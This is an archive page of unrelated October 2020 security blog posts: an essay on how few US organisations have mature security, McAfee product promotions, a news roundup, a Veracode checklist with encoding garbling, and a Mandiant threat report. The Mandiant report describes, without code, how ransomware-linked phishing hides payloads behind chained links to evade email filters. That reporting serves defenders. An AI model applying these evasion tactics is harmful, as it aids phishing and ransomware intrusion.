Monthly Archives: October 2020

Security and the One Percent: A Thought Exercise in Estimation and Consequences

There's a good chance that if you're reading this post, you're the member of an exclusive club. I call it the security one percent, or the security 1%. This is shorthand for the assortment of people and organizations who have the personnel, processes, technology, and support to implement somewhat robust digital security programs, especially those with the detection and response capabilities and not just planning and resistance/"prevention" functions. 

Introduction 


This post will estimate the size of the security 1% in the United States. It will then briefly explain how the security strategies of the 1% might be irrelevant at best or damaging at worse to the 99%.

A First Cut with FIRST


It's difficult to measure the size of the security 1%, but not impossible. My goal is to ascertain the correct orders of magnitude. 

One method is to review entities who are members of the Forum of Incident Response and Security Teams, or FIRST. FIRST is an organization to which high-performing computer incident response teams (CIRTs) may apply once their processes and data handling meet standards set by FIRST. 

I learned of FIRST when the AFCERT was a member in the late 1990s. I also assisted with FIRST duties when Foundstone was a member in the early 2000s. I helped or sponsored membership when I worked at General Electric in the 2000s and Mandiant in the 2010s. I encourage all capable security teams to join FIRST.

Being a FIRST member means having a certain degree of incident response and data handling capability, and it signals to the world and to other FIRST teams that the member entity is serious about incident detection and response.

As of the writing of this post, there are 540 FIRST teams worldwide. Slightly more than 100 of them are based in the United States. 

To put that in perspective, there are less than 4,000 publicly traded companies in the US. That means that even if every single US FIRST member represented a publicly traded company -- and that is not the case -- FIRST representation for US publicly traded companies is only 2.5%

Beyond FIRST


Some of you might claim FIRST membership is no big deal. My current employer, Corelight, isn't a member, you might say. 

Perhaps you could argue that for every US FIRST member, there are 9 others which have equivalent or better security teams. That would increase the cadre of entities with respectable detection and response capabilities from 100 to 1,000. That would still mean an estimate that says 75% of publicly traded US companies have sub-par or non-existent security programs.

Remember that we've only been talking about a population of 4,000 publicly traded US companies. The US Small Business and Entrepreneurship Council estimates that there were 5.6 million employer firms in the United States in 2016. Let's sadly reduce that to 4 million to account for the devastation of Covid. 

(This reduction actually makes the situation actually look better for security, as terrible as it is either way. In other words, if I used a denominator of 5.6 million and not 4 million, security estimates would be 40% worse.)


Small Business and Entrepreneurship Council


Let's be really generous and assume that only 1 in 100 of those 4 million businesses have any sensitive data. (That's again very generous.) 

That leaves us with 400,000 entities with data worth defending. (Again, all of these estimates make it look like we're doing better than we actually are. The reality is probably a lot worse.)

Remember that we only had 100 US teams in FIRST, and we assumed an incredible 10-to-1 ratio to add another 900 non-FIRST organizations to the list of entities with decent security.

Now let's be generous again and assume a 4-to-1 ratio, such that for every 1 team in the publicly traded world there are 3 in the private world that also have decent security.

This creates a total of 4,000 US organizations with decent security, out of 400,000 that need it. Those 4,000 are the security 1%.

If you think of the "best of the best," there's probably only about 40 US security teams that qualify as global leaders and innovators. These are the teams that can stand toe-to-toe with most foes, and still struggle due to the nature of the security challenge. You and I could probably name them: Lockheed Martin, Google, General Electric, etc.

That group of 40 is the 1% of the 1%, being 40 of the 4,000 of the 400,000. These 40 are the US .01%.

If you think I'm being too conservative with only 40 teams, then feel free to increase it to 400. I'd be really curious to see someone compile a list of 400 world-beating security teams. That would still mean that US group of 400 is the .1%.

Sanity Check: A Few Statistics


To give you a sense of my numbers, and whether they are of the right order of magnitude at least, here are a few statistics:

1. The 2020 Accenture Security Third Annual State of Cyber Resilience Report featured responses from 4,644 "executives," This is the same order of magnitude of my estimates here, diluted due to a global perspective. (In other words, there are actually less US executives responding to this survey due to the global respondent pool.)


2020 Accenture Security Third Annual State of Cyber Resilience Report, p 46


2. The 2021 PWC Global Digital Trust Insights Report featured responses from "3,249 business and technology executives around the world." This is again the same order of magnitude, again diluted due to global responses.

2021 PWC Global Digital Trust Insights Report, Web summary


3. A 2019 report by Bitglass found that 38% of the Fortune 500 do not have a CISO. That's 190 publicly traded companies! Hopefully it's less in 2020. Let's be crazy and assume the CISO count is 400 out of 500?

2019 Bitglass Report


4. The Verizon DBIR featured reporting from 81 entities, the highest number in the history of the report. I do not know how many are in the US, but it's obviously less than 100, so the order of magnitude is again preserved. In other words, of the 4,000 capable security organizations in the US, less than 2.5% of them contributed to the DBIR. That would be less than 100, or the number of US FIRST teams.


2020 Verizon DBIR Report


Remember that my focus here is the United States. This means the numbers from PWC, Accenture, and Verizon need to be reduced because they represent global audiences. However, the original FIRST count of roughly 100 American entities, and the statistic about the Fortune 500, which is just American companies, are already appropriately sized.

Security and the One Percent


What do these numbers mean for security? 

Speaking first just for the US, it means that most of the conversations among security practitioners on Twitter, in mailing lists, during Webinars, within classes, and other gatherings of people take place within a very small grouping. These are the 1% that are part of the roughly 4,000 entities in the US that have a decent security capability. 

If those are the 1%, it means that the 99% are not included in these discussions.

This means that free threat intelligence, or free classes, or free post-exploitation security tools, or other free capabilities mean nothing, or almost nothing to those 99% of organizations that do not have security capabilities, or whose capabilities are so low or stretched that they cannot take advantage of whatever the 1% offers.

An Analogy: Personal Finance


I almost became a certified financial planner. Had I not secured a job in the AFCERT, I planned to separate from the Air Force, earn my CFP designation, and advise people on how to manage their assets and prepare for retirement. 

I've come to realize that discussions I witness in the "security community" are like the discussions I see in the finance community. It requires taking a big step back to appreciate this situation.

People at the 1% level in finance want to know how to manage their stock options, or how to save money for their child's college tuition through specialized savings vehicle, or, at the highest ends, how to move assets throughout "Moneyland" in pursuit of ever lower taxes. 

These concerns are light-years away from the person who has a few dollars saved in an employer-provided 401(k) program, or who has little to no savings whatsoever.  


The Consequences of the Security One Percent


So what's the big deal?

The consequence of the existence and mindshare dominance of the security 1% is that the strategies and tactics they employ may work for the 1%, but not the 99%. 

I'm not talking about the "rich" preying on the "poor." That's neither my message nor my philosophical outlook. 

Rather, I mean that methods that the security 1% use to defend themselves are irrelevant at best to the 99%, and damaging at worst to the 99%.

An example of irrelevance would be providing free indicators of compromise (IOCs) or other forms of threat intelligence. It's well-meaning but ultimately of no help to the 99%. If an entity in the 99% has a rudimentary security capability, or essentially zero security capability, threat intelligence is irrelevant.

An example of damage would be publication of post-exploitation security tools, or PESTs. The 1% may have the ability to use such tools to equip their red or penetration testing teams, determining if the countermeasures implemented by their blue team can resist or detect and respond to their simulated and later actual attacks. The 99%, however, have little to no ability to leverage PESTs. They end up simply being victims when actual intruders use PESTs to pillage the 99%'s assets.

Conclusion


Readers can argue with my numbers. These are estimates, yes, but I believe I've gotten the orders of magnitude right, at least in the US. It's probably worse overseas, especially in the developing world. 

The point of this exercise is to propose the idea that the benefits of certain activities that may accrue to the 1% may be, and likely are, irrelevant and/or damaging to the 99%.

In brief:

I challenge the security 1% to first recognize their elite status, and second, to think how their beliefs and actions affect the 99% -- especially for the worse.

As this is a wicked problem, there is no easy answer. That may be worth a future blog post.

McAfee Named a Leader in the 2020 Gartner Magic Quadrant for CASB

McAfee MVISION Cloud was the first to market with a CASB solution to address the need to secure corporate data in the cloud. Since then, Gartner has published several reports dedicated to the CASB market, which is a testament to the critical role CASBs play in enabling enterprise cloud adoption. Today, Gartner named McAfee a Leader in the 2020 annual Gartner Magic Quadrant for Cloud Access Security Brokers (CASB) for the fourth time evaluating CASB vendors.

Cloud access security brokers have become an essential element of any cloud security strategy, helping organizations govern the use of cloud and protect sensitive data in the cloud. Security and risk management leaders concerned about their organizations’ cloud use should investigate CASBs.

In its fourth Magic Quadrant for Cloud Access Security Brokers, Gartner evaluated eight vendors that met its inclusion criteria. MVISION Cloud, as part of the MVISION family of products at McAfee, is recognized as a Leader in the report; and for the fourth year in a row. To learn more about how Gartner assessed the market and MVISION Cloud, download your copy of the report here.

This year, Gartner commissioned a highly rigorous process to compile its Gartner Magic Quadrant for Cloud Access Security Brokers (CASB) report and they relied on numerous inputs to compile the report, including these materials from vendors to understand their product offerings:

  • Questionnaire – A 300+ point questionnaire resulting in hundreds of pages of responses
  • Financials – Detailed company financial data covering CASB revenue
  • Documentation – Access to all product documentation
  • Customer Peer Reviews – Gartner encourages customers to submit anonymized reviews via their Peer Insights program. You can read them here.
  • Demo – Covering over 50 Gartner-defined use cases to validate product capabilities

In 2020, McAfee made several updates and additions to its solutions, strengthening its position as an industry experts  including:

 

McAfee also received recognition as the only vendor to be named the January 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers based on customer feedback and ratings for McAfee MVISION Cloud.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The Gartner Peer Insights Logo is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved

Gartner Peer Insights ‘Voice of the Customer’: Cloud Access Security Brokers, Peer Contributors, 13 March 2020. Gartner Peer Insights reviews constitute the subjective opinions of individual end users based on their own experiences and do not represent the views of Gartner or its affiliates. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a Leader in the 2020 Gartner Magic Quadrant for CASB appeared first on McAfee Blogs.

This Week in Security News: Trend Micro Researcher Uncover Two Espionage Backdoors Associated with Operation Earth Kitsune and Trickbot and Ransomware Attackers Plan Big Hit on U.S. Hospitals

Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, learn about how Trend Micro researchers uncovered two new espionage backdoors associated with the ‘Operation Earth Kitsune’ campaign. Also, read about how U.S. healthcare providers have been put on high alert over Trickbot malware and ransomware targeting the sector.

Read on:

Operation Earth Kitsune: A Dance of Two New Backdoors

Trend Micro recently published a research paper on Operation Earth Kitsune, a watering hole campaign aiming to steal information by compromising websites. Besides its heavy use of SLUB malware, Trend Micro researchers also uncovered two new espionage backdoors associated with the campaign: agfSpy and dneSpy, dubbed as such following the attackers’ three-letter naming scheme.

FBI Warning: Trickbot and Ransomware Attackers Plan Big Hit on U.S. Hospitals

U.S. healthcare providers, already under pressure from the COVID-19 pandemic, are on high alert over Trickbot malware and ransomware targeting the sector. Trickbot is one of the largest botnets in the world, against which Microsoft took U.S. legal action earlier this month in effort to gain control of its servers. Within a day of the seizure, Trickbot C&C servers and domains were replaced with new infrastructure.

Trend Micro HouseCall for Home Networks

While a home network provides numerous benefits, it can also expose its users to safety and privacy risks. Checking for those risks doesn’t need to be costly: Trend Micro’s Housecall for Home Networks (HCHN) solution scans the connected devices in home networks and detects those that pose security risks and is available for free.

Bug-Bounty Awards Spike 26% in 2020

According to a list of top 10 vulnerabilities by HackerOne, cross-site scripting (XSS) remained the most impactful vulnerability and reaped the highest rewards for ethical hackers in 2020 for the second year in a row, earning hackers $4.2 million in total bug-bounty awards in the last year, a 26-percent increase from what was paid out in 2019 for finding XSS flaws. Following XSS on the list: Improper access control, information disclosure, server-side request forgery (SSRF) and more.

Supply Chain Attacks in the Age of Cloud Computing: Risks, Mitigations, and the Importance of Securing Back Ends

Security is an aspect that every enterprise needs to consider as they use and migrate to cloud-based technologies. On top of the list of resources that enterprises need to secure are networks, endpoints, and applications. However, another critical asset that enterprises should give careful security consideration to is their back-end infrastructure which, if compromised, could lead to supply chain attacks.

U.S. Shares Information on North Korean Threat Actor ‘Kimsuky’

An alert released this week by the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Cyber Command Cyber National Mission Force (CNMF) provides information on Kimsuky, a threat actor focused on gathering intelligence on “foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions” on behalf of the North Korean government. The advisory says the adversary has been active since 2012, engaging in social engineering, spear-phishing, and watering hole attacks.

76% of Applications Have at Least One Security Flaw

Most applications contain at least one security flaw and fixing those flaws typically takes months, a new Veracode report reveals. This year’s analysis of 130,000 applications found that it takes about six months for teams to close half the security flaws they find. The report also uncovered some best practices to significantly improve these fix rates.

Apps Infected with Adware Found on Google Play Store

Some 21 malicious Android apps containing intrusive adware were discovered on the Google Play Store, but most have now been removed, according to a report from Avast. These fraudulent mobile applications, disguised as Android gaming apps, had been downloaded more than 8 million times since they were made available in the store.

Patients in Finland Blackmailed After Therapy Records Were Stolen by Hackers

The confidential records of thousands of psychotherapy patients in Finland have been hacked and some are now facing the threat of blackmail. Attackers were able to steal records related to therapy sessions, as well as patients’ personal information including social security numbers and addresses, according to Vastaamo, the country’s largest private psychotherapy center.

Surprised by the Vastaamo hack and subsequent blackmail of patients?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Researcher Uncover Two Espionage Backdoors Associated with Operation Earth Kitsune and Trickbot and Ransomware Attackers Plan Big Hit on U.S. Hospitals appeared first on .

Catch the Most Sophisticated Attacks Without Slowing Down Your Users

Most businesses cannot survive without being connected to the internet or the cloud. Websites and cloud services enable employees to communicate, collaborate, research, organize, archive, create, and be productive.

Yet, the digital connection is also a threat. External attacks on cloud accounts increased by an astounding 630% in 2019. Ransomware and phishing remain major headaches for IT security teams, and as users and resources have migrated outside of the traditional network security perimeter, it’s become increasingly difficult to protect users from clicking on a link or opening a malicious file.

This challenge has increased the tension between two IT mandates—allowing unfettered access to necessary services, while preventing attacks and blocking access to malicious sites. Automation helps significantly with modern security pipelines blocking about 99.5% of malicious and suspicious activity by filtering known bad files and sites, as well as using sophisticated anti-malware scanning and behavioral analytics.

Security is a lot of work

However, the remaining half of 1% still represents a significant number of sites and potential threats that require time for a team of security analysts to triage. Therefore, IT managers are faced with the challenge of devising balanced security policies. Many companies default to blocking unknown traffic, but over-blocking of web sites and content can hinder user productivity while creating a surge in help-desk tickets as users attempt to go to legitimate sites that have not yet been classified. On the flipside, web policies that allow access too freely greatly increases the likelihood of serious, business-threatening security incidents.

With a focus on digital transformation, accelerated by the change in work habits and locations during the pandemic, companies need flexible, transparent security controls that enable safe user access to critical web and cloud resources without overwhelming security teams with constant help desk calls, policy changes, and manual triaging. Remote Browser Isolation – if implemented properly – can help achieve this.

While security solutions leveraging URL categorization, domain reputation, antivirus, and sandboxes can stop 99.5% of threats, remote browser isolation (RBI) can handle the remaining unknown events, rather than the common strategy of choosing to rigidly block or allow everything. RBI allows web content to be delivered and viewed in a safe environment, while analysis is conducted in the background. Using RBI, any request to an unknown site or URL that remains suspicious after traversing the web protection defense-in-depth pipeline will be rendered remotely, preventing any impact to a user’s system in the event the content is malicious.

Relying on RBI

Remote browser isolation blocks malicious code from running on an employee’s system just because they clicked a link. The technology will also prevent pages from using unprotected cookies to try and gain access to protected web services and sites. Such protections are particularly important in the age of ransomware, when an inadvertent click on a malicious link can lead to significant damage to a company’s digital assets.

Given the benefits of remote browser isolation, some companies have deployed the technology to render every site. While this can very effectively mitigate security risk, isolating all web and cloud traffic demands considerable computing resources and is prohibitively expensive from a license cost point of view.

By integrating remote browser isolation (RBI) technology directly into our MVISION Unified Cloud Edge (UCE) solution, McAfee integrates RBI with the existing triage pipeline. This means that the rest of the threat protection stack – including global threat intelligence, anti-malware, reputation analysis, and emulation sandboxing – can filter out the majority of threats while only one out of every 200 requests needs to be handled using the RBI. This dramatically reduces overhead. McAfee’s UCE makes this approach dead simple: rather than positioning remote browser isolation as a costly and complicated add-on service, it is included with every MVISION UCE license.

Full Protection for High-Risk Individuals

However, there are specific people inside a company—such as the CEO or the finance department—with whom you cannot take chances. For those privileged users, full isolation from potential internet threats is also available. This approach ensures full virtual segmentation of the user’s system from the internet and shields it against any potential danger, enabling him to use the web and cloud freely and productively.

McAfee’s approach greatly reduces the risk of users being compromised by phishing campaigns or inadvertently getting infected by ransomware – such attacks can incur substantial costs and impact an organization’s ability to operate. At the same time, organizations benefit from a workforce that is freely able to access the web and cloud resources they need to be productive, while IT staff are freed from the burden of rigid web policies and constantly addressing help-desk tickets. .

Want to know more? Check out our RBI demonstration.

The post Catch the Most Sophisticated Attacks Without Slowing Down Your Users appeared first on McAfee Blogs.

With No Power Comes More Responsibility

You’ve more than likely heard the phrase “with great power comes great responsibility.” Alternatively called the “Peter Parker Principle” this phrase became well known in popular culture mostly due to Spider-Man comics and movies – where Peter Parker is the protagonist. The phrase is so well known today that it actually has its own article in Wikipedia. The gist of the phrase is that if you’ve been empowered to make a change for the better, you have a moral obligation to do so.

However, what I’ve noticed as I talk to customers about cloud security, especially security for the Infrastructure as a Service (IaaS) is a phenomenon I’m dubbing the “John McClane Principle” – the name has been changed to protect the innocent 🙂

The John McClane Principle happens when someone has been given responsibility for fixing something but at the same time has not been empowered to make necessary changes. At the surface this scenario may sound absurd, but I bet many InfoSec teams can sympathize with the problem. The conversation goes something like this:

  • CEO to InfoSec: You need to make sure we’re secure in the cloud. I don’t want to be the next [insert latest breach here].
  • InfoSec to CEO: Yeah, so I’ve looked at how we’re using the cloud and the vast majority of our problems are from a lack of processes and knowledge. We have a ton of teams that are doing their own thing in the cloud, and I don’t have complete visibility into what they’re doing.
  • CEO to InfoSec: Great, go fix it.
  • InfoSec to CEO: Well the problem is I don’t have any say over those teams. They can do whatever they want. To fix the problem they’re going to have change how they use the cloud. We need to get buy-in from managers, but those managers have told me they’re not interested in changing anything because it’ll slows things down.
  • CEO to InfoSec: I’m sure you’ll figure it out. Good luck, and we better not have a breach.

That’s when “with no power comes more responsibility” rings true.

And why is that? The reason being is that IaaS has fundamentally changed how we consume IT and along with that how we scale security. No longer do we submit purchase requests and go through a long, lengthy processes to spin up infrastructure resources. Now anyone with a credit card can spin up the equivalent of a data center within minutes across the globe.

The agility however introduced some unintended changes to InfoSec and in order to scale, cloud security cannot be the sole responsibility of one team. Rather cloud security must be embedded in process and depends on collaboration between development, architects, and operations. These teams now have a more significant role to play in cloud security, and in many cases are the only ones who can implement change in order to enhance security. InfoSec now acts as Sherpas instead of gatekeepers to make sure every team is marching to the same, secure pace.

However, as John McClane can tell you the fact that more teams look after cloud security doesn’t necessarily mean you have a better solution. In fact, having to coordinate across multiple teams with different priorities can make security even more complex and slow you down. Hence the need for a streamlined security solution that facilitates collaboration between developers, architects, and InfoSec but at the same time provides guardrails, so nothing slips throw the cracks.

With that, I’m excited to announce our new cloud security service built especially for customers moving and developing applications in the cloud. We call it MVISION Cloud Native Application Protection Platform – or just CNAPP because every service deserves an acronym.

What is CNAPP? CNAPP is a new security service we’ve just announced today that combines solutions from Cloud Security Posture Management (CSPM), Cloud Workload Protection Platform (CWPP), Data Loss Prevention (DLP), and Application Protection into a single solution. Now in beta with a target launch date of Q1, 2021, we built CNAPP to provide InfoSec teams broad visibility into their cloud native applications. For us, the goal wasn’t how do we slow things down to make sure everything is secure; rather how do we enable InfoSec teams the visibility and context they need for cloud security while allowing dev teams to move fast.

Let me briefly describe what features CNAPP has and list some features that are customer favorites.

CSPM

The vast majority of breaches in IaaS today are due to service misconfigurations. Gartner famously said in 2016 that “95% of cloud security failures will be the customer’s fault.”Just last year Gartner updated that quote to say “99% of cloud security failures will be the customers’ fault.” I’m waiting for the day when Gartner’s says “105% will be the customer’s fault.”

Why is the percentage so high? There are multiple reasons, but we hear a lot from our customers that there is a huge lack of knowledge on how to secure new services. Each cloud provider is releasing new services and capabilities at a dizzying pace with no blockers for adoption. Unfortunately, the industry hasn’t matched pace of having a workforce that knows and understands how best to configure these new services and capabilities. CNAPP provides customers with the ability to immediately audit all cloud services and benchmark those services against best security practices and industry standards like CIS Foundations, PCI, HIPPA, and NIST.

Within that audit (we call it a security incident), CNAPP provides detailed information on how to reconfigure services to improve security, but the service also provides the ability to assign the security incident to dev teams with SLAs so there’s no ambiguity on who owns what and what needs to change. All of these workflows can be automated so multiple teams are empowered in near real-time to find and fix problems.

Additionally, CNAPP has a custom policy feature where customers can create policies for identifying risky misconfigurations unique to their environments as well as integrations with developer tools like Jenkins, Bitbucket, and GitHub that provide feedback on deployments that don’t meet security standards.

CWPP

IaaS platforms have become catalysts for Open Source Software (OSS) like Linux (OS), Docker (container), and Kubernetes (orchestration). The challenge with using these tools is the inherit risk of Common Vulnerabilities and Exposures (CVE) found in software libraries and misconfigurations in deploying new services. Another famous quote by Gartner is that “70% of attacks against containers will be from known vulnerabilities and misconfigurations that could have been remediated.” But how does the InfoSec team quickly spot those vulnerabilities and misconfigurations, especially in ephemeral environments with multiple developer teams pushing frequent releases into CI/CD pipelines?

Based on our acquisition of NanoSec last year, CNAPP provides full workload protection by identifying all compute instances, containers, and container services running in IaaS while identifying critical CVEs, misconfigurations in both repository and production container services, and introducing some new protection features. These features include application allow listing, OS hardening, and file integrity monitoring with plans to introduce nano-segmentation and on-prem support soon.

Customer Favorites

We’ve had a great time working jointly with our customers to release CNAPP. I’d like to highlight some of the use cases that have proven to be game changers for our customers.

  • In-tenant DLP scans: many of our customers have legitimate use cases for publicly exposed cloud storage services (sometimes referred to as buckets), but at the same time need to ensure those buckets don’t have sensitive data. The challenge with using DLP for these services is many solutions available in the market copy the data into the vendor’s own environment. This increases customer costs with egress charges and also introduces security challenges with data transit. CNAPP allows customers to perform in-tenant DLP scans where the data never leaves the IaaS environment, making the process more secure and less expensive.
  • MITRE ATT&CK Framework for Cloud: the language of Security Operation Centers (SOC) is MITRE, but there is a lot of nuance in how cloud security incidents fit into this framework. With CNAPP we built an end-to-end process that maps all CSPM and CWPP security incidents to MITRE. Now InfoSec and developer teams can work more effectively together by automatically categorizing every cloud incident to MITRE, facilitating faster responses and better collaboration.
  • Unified Application Security: CNAPP is built on the same platform as our MVISION Cloud service, a Gartner Magic Quadrant Leader for Cloud Access Security Broker (CASB). Customers are now able to get detailed visibility and security control over their SaaS applications along with applications they are building in IaaS with the same solution. Our customers love having one console that provides a holistic picture of application risk across all teams – SaaS for consumers and IaaS for builders.

There are a lot more features I’d love to highlight, but instead I invite you to check out the solution for yourself. Visit https://mcafee.com/CNAPP for more information on our release or request a demo at https://mcafee.com/demo. We’d love to get your feedback and hear how MVISION CNAPP can help you become more empowered and responsible in the cloud.

This post contains information on products, services and/or processes in development. All information provided here is subject to change without notice at McAfee’s sole discretion. Contact your McAfee representative to obtain the latest forecast, schedule, specifications, and roadmaps.

The post With No Power Comes More Responsibility appeared first on McAfee Blogs.

A Software Security Checklist Based on the Most Effective AppSec Programs

Veracode???s Chris Wysopal and Chris Eng joined Enterprise Strategy Group (ESG) Senior Analyst Dave Gruber and award-winning security writer and host of the Smashing Security podcast, Graham Cluley, at Black Hat USA to unveil the findings from a new ESG research report, Modern Application Development Security. The research is based on a survey of nearly 400 developers and security professionals, which explored the dynamic between the roles, their trigger points, the extent to which security teams understand modern development, and the buying intentions of application security (AppSec) teams.

As the presenters went through the data, it led to a larger discussion about AppSec best practices and what steps organizations can take to mature their programs. Here are the best practices laid out during the presentation as an easy-to-follow checklist as well as supporting data from the ESG report.

Application security controls are highly integrated into the CI/CD toolchain.

In the ESG survey, 43 percent of organizations agreed that DevOps integration is most important to improving AppSec programs, but only 56 percent of respondents answered that they use a highly integrated set of security controls throughout their DevOps process. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment.

Application security best practices are formally documented.

In order to have a successful AppSec program, everyone needs to be on the same page regarding best practices. The CISO should help facilitate the formal documentation of AppSec best practices. Developers and security professionals can reference the list and use it to guide their decisions.

Application security training is included as part of the ongoing development security training program.

Developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities. Most developers don???t receive secure code training courses in college, so it is up to organizations to offer security training. But according to the survey, more than 20 percent of organizations only provide training when developers join the team.

Developers should have multiple, at-leisure training opportunities throughout the year, like virtual or hands-on programs ??? such as Veracode Security Labs. Chris Wysopal pointed out the importance of human touchpoints as part of ongoing developer training. If someone is checking in on developers to make sure they???re completing their training, they???ll likely take it more seriously. Consider a security champions program. The security champions are developers who have an interest in learning about security. If you have at least one security champion on every scrum team, that person can help ensure that their peers are up to speed on the latest security training and best practices.

Ongoing developer security training includes formal training programs, and a high percentage of developers participate.

At-leisure security training is a great way for developers to learn on their own time. But it is also important to implement formal security training with a set completion date and a skills assessment. Without formal security training, developers may not develop the skills they need to write secure code and remediate vulnerabilities. This could lead to slower and more expensive deployments because of rework or vulnerable code being pushed to production.

According to the survey, 35 percent of respondents answered that less than half of their development teams are participating in formal training. And only 15 percent reported that all their developers are participating. As for frequency, less than half require their developers to engage in formal training more than once per year.

Development managers are responsible for communicating best practices to developers.

Developers rely on the information they receive from their development managers. Development managers should be following the organization???s documented AppSec best practices and they should be communicating the best practices to the developers.

Security issues are traced back to the individual development teams.

42 percent of organizations responded that they track security issue introduction for individual development teams. This number should be much higher because if you don???t track security issues introduced by each team, the team could make the same mistake multiple times. When you track the security issues, you can target efforts to improve those teams and individuals who introduce the most issues.

You track your AppSec program using formal processes and metrics to ensure that it???s continuously improving.

You should have a formal process in place to regularly measure your AppSec program using metrics. With the right metrics, you can pinpoint areas where your AppSec program is performing well and areas that could use improvement. The data can also be used to show senior management or stakeholders if their AppSec investment is getting the right return on investment (ROI).

You track individual development teams using metrics to ensure that they are continuously improving.

Just as you should be tracking if security issues are introduced by individual development teams, you should also be tracking if the development teams are making continuous improvements. If you are addressing teams or individuals when security issues are introduced, it should be expected that the teams/individuals are taking steps to ensure that the same mistake doesn???t happen again. Metrics can be used to prove that the teams are actively making improvements.

You track security issues during the code development process.

If code is not tracked for security issues in the development phase and a vulnerability is identified later in the software development lifecycle (SDLC), it can be costly and time consuming to fix the flaws. You can track the code with a tool like Veracode???s IDE Scan. The IDE Scan reviews code in real-time and provides remediation methods. ツ?

Automated risk aggregation tools roll-up risk to keep senior development leaders informed.

Senior development leaders should be fully aware of the risks and vulnerabilities in applications. Consider using automation risk aggregation tools to keep leaders informed in an efficient manner.

ツ?

To make sure your organization is following the best practices, download the printer-ready Software Security Checklist: 10 Elements of an Effective AppSec Program.

NIST Offers ‘Quick-Start’ Guide for Its Security and Privacy Safeguards Catalog

If you’ve ever tried to set up a home entertainment system by poring over a thick manual, you might appreciate the manufacturer also providing you with a quick-start guide so you can get your party going in short order. Information security experts at the National Institute of Standards and Technology (NIST) have created what is essentially a quick-start guide to their flagship risk management tool, to help organizations reduce their security and privacy risks more easily. Their creation, whose full title is Control Baselines for Information Systems and Organizations (NIST Special Publication

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

